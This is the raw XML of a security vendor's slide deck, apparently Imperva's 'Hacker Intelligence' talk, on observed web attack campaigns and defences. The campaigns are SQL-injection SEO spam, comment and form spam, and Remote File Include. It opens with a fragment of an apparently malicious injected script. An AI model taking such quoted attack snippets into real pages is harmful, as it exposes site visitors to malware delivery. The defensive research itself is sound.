pitchFamily="18" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>('&lt;'+'!--'); &lt;/SCRIPT&gt;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05000" y="4800600"/>
              <a:ext cx="2895600" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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14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ops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943600" cy="4495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Massive Black-hat SEO operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hundreds of sites, tens of thousands of pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploited through SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Infected with hidden cross-references to each other and hidden text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also infected with malware delivery script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clearly driven through automation</a:t>
            </a:r>
          </a:p>
          <a:p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Automation once again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must do something about those SQL Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signatures on hosts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8674" name="Picture 2" descr="http://webtys.com/pics/h_autom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219199"/>
            <a:ext cx="2825115" cy="4527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Spam on http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Analyze traffic of a single application over 120 days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application is NOT vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any human would have picked it quickly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can see that there is a small number of persistent sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most attacks are generated by a small number of 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SPAM on HTTP Forms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876800" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Most attack sources are known to be mail spammers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.projecthoneypot.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Top 10 are long time spammers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks are automated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active spam sources should be blocked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known spam content should be blocked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4578" name="Picture 2" descr="http://www.rentalservers.net/images/email-sp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057400"/>
            <a:ext cx="3810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 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Analyzed traffic of 4 small applications over 90 days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications are NOT vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some persistent sources while most traffic is dispersed across many others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36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hillsinc.net/images/automation/automatio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429665"/>
            <a:ext cx="3352800" cy="3370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 Include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334000" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most sources are not known to have a bad reputation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some sources attempt include of various different targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most targets are attempted by multiple sources in time proximity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Include targets are on compromised servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Again, attacks are automated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 Include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“include targets” use deceit in order to ensure longer life span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0850" y="2105025"/>
            <a:ext cx="5644084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175" y="2524125"/>
            <a:ext cx="6334125" cy="38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 Include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“include targets” are complex shell programs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775" y="2219325"/>
            <a:ext cx="6096000" cy="429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 Include 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action we’ve taken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improve generic “Remote File Include” signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add targets to list of signatures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14338" name="Picture 2" descr="http://cb3blog.files.wordpress.com/2009/02/target-destroy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819400"/>
            <a:ext cx="4138807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://doctormarlen.files.wordpress.com/2007/07/evidence-stamp_lrg-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819400"/>
            <a:ext cx="29718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>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0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itchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What did we learn? What’s next?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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itybugs.tamu.edu/FastSheets/images/honey_bee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4672" y="1295400"/>
            <a:ext cx="2439328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705600" cy="4495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Hacking Activity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers are keeping busy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spam activity is prevailing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click fraud activity is intensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most attack traffic is generated by automated tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack campaigns are becoming ever more complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Research Activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have been able to drive real value by regularly analyzing hacker activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notify vendors of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fast deployment of new security rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Purpose built product features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4114800"/>
            <a:ext cx="1777699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oplessrobot.com/roboc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676400"/>
            <a:ext cx="2265003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 of our hack-o-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>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553200" cy="4495799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We (at Imperva) are going to increase our investment in this direction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Obtain more data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enhance our network of probes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create new probe types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client side probes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compromised servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improve analysis capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Develop a consistent methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Automatic extraction of rules and signatures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It’s time to get proactive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DIY or get a consultant or a service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Scan Google for Dorks with respect to your application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Dorks and tools are available on the net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Search Google for Honey Tokens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Distinguishable credentials or credential sets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Specific distinguishable character strings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Watch out for your name popping up in the wrong forums…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Get ready to fight automation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CAPTCHA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Adaptive authentication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Access rate control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Click rate control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Don’t bring a knife to a gun fight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886200"/>
            <a:ext cx="1265830" cy="1924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886200"/>
            <a:ext cx="2540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concept:  Be Proactive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334000" cy="44957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Application Security Meets Proactive Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduce proactive detection into your security environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Quickly identify and block source of recent malicious activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enhance attack signatures with content from recent attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identify and block sustainable attack platforms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anonymous proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOR relays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active bots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identify references from compromised servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduce reputation based controls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2FCCD-E097-43DE-B5C2-FC10EEC7DF63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4100" name="Picture 4" descr="babygate.jpg (1000×12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200400"/>
            <a:ext cx="2286000" cy="2687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://images.essentialbaby.com.au/2009/02/16/384311/baby-proof-home-420x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371600"/>
            <a:ext cx="2362200" cy="157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 smtClean="0">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Q&amp;A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:latin typeface="Trebuchet MS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rebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>info@imperva.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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6_ImpervaTemplate_Final2">
  <a:themeElements>
    <a:clrScheme name="Office Theme 3">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="020406"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="969696"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="BC0400"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="1F497D"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FFFFFF"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="000000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="DAAAAA"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="1B4171"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00709E"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="DD5900"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="6_ImpervaTemplate_Final2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20406"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="EEECE1"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="BC0400"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="1F497D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="DAAAAA"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="1B4171"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="00709E"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="DD5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20406"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="969696"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="BC0400"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="1F497D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="DAAAAA"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="1B4171"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="00709E"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="DD5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Office Theme 3">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="020406"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="969696"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="BC0400"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="1F497D"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FFFFFF"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="000000"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="DAAAAA"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="1B4171"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="00709E"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="DD5900"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride2.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="3_Office Theme 3">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="020406"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="969696"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="BC0400"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="1F497D"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FFFFFF"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="000000"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="DAAAAA"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="1B4171"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="00709E"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="DD59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9C69BB725694DA6E423A03CBBB6B4" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="46d5953af726cb2f60e5c2e4152cea5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A958AC2-971E-4811-9CFF-BAFDCCDAC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CDA010A0-0779-4396-B114-74563A7B1A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93B528-A05A-441C-A948-2D7ED834E8C2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ImpervaTemplate_Final2</Template>
  <TotalTime>11012</TotalTime>
  <Words>1719</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>401</Paragraphs>
  <Slides>46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6_ImpervaTemplate_Final2</vt:lpstr>
      <vt:lpstr>Hacker Intelligence:  6 Months of Attack Vector Research </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>We Live In a dangerous world</vt:lpstr>
      <vt:lpstr>Know your Enemy</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>We have created a “hack-o-scope”</vt:lpstr>
      <vt:lpstr>The Good</vt:lpstr>
      <vt:lpstr>The Bad</vt:lpstr>
      <vt:lpstr>The UGLY</vt:lpstr>
      <vt:lpstr>Analysis</vt:lpstr>
      <vt:lpstr>Hacker chit-chat</vt:lpstr>
      <vt:lpstr>Hacker chit-chat - Quantitative analysis</vt:lpstr>
      <vt:lpstr>Hacker chit-chat - Quantitative analysis(2)</vt:lpstr>
      <vt:lpstr>Hacker chit-chat - Qualitative analysis</vt:lpstr>
      <vt:lpstr>Hacker chit-chat - Qualitative analysis(2)</vt:lpstr>
      <vt:lpstr>Hacker Chit-chat – Specific issues</vt:lpstr>
      <vt:lpstr>An anonymous tip</vt:lpstr>
      <vt:lpstr>TOR Will get you more</vt:lpstr>
      <vt:lpstr>Yahoo!</vt:lpstr>
      <vt:lpstr>Yahoo!(2)</vt:lpstr>
      <vt:lpstr>Yahoo!(3)</vt:lpstr>
      <vt:lpstr>Yahoo!(4)</vt:lpstr>
      <vt:lpstr>Yahoo!(5)</vt:lpstr>
      <vt:lpstr>Yahoo!(6) – Follow up</vt:lpstr>
      <vt:lpstr>Comment SPAM</vt:lpstr>
      <vt:lpstr>COMMENT SPAM(2)</vt:lpstr>
      <vt:lpstr>Comment spam(3)</vt:lpstr>
      <vt:lpstr>Get your tickets ready</vt:lpstr>
      <vt:lpstr>Get your tickets ready (2)</vt:lpstr>
      <vt:lpstr>Black ops</vt:lpstr>
      <vt:lpstr>Black ops (2)</vt:lpstr>
      <vt:lpstr>Black ops (3)</vt:lpstr>
      <vt:lpstr>Mail Spam on http Forms</vt:lpstr>
      <vt:lpstr>Mail SPAM on HTTP Forms (2)</vt:lpstr>
      <vt:lpstr>Remote File Include</vt:lpstr>
      <vt:lpstr>Remote File Include (2)</vt:lpstr>
      <vt:lpstr>Remote File Include (3)</vt:lpstr>
      <vt:lpstr>Remote File Include (4)</vt:lpstr>
      <vt:lpstr>Remote File Include (5)</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Conclusions</vt:lpstr>
      <vt:lpstr>The Future of our hack-o-scopE</vt:lpstr>
      <vt:lpstr>Final Thoughts</vt:lpstr>
      <vt:lpstr>Key concept:  Be Proactive</vt:lpstr>
      <vt:lpstr>Q&amp;A</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>The Presentation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Arial 32 pt, Bold, Black</dc:title>
  <dc:creator>Tal Beery</dc:creator>
  <cp:lastModifiedBy>talb</cp:lastModifiedBy>
  <cp:revision>479</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-01-08T19:38:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-09-05T09:39:02Z</dcterms:modified>
</cp:coreProperties>
</file>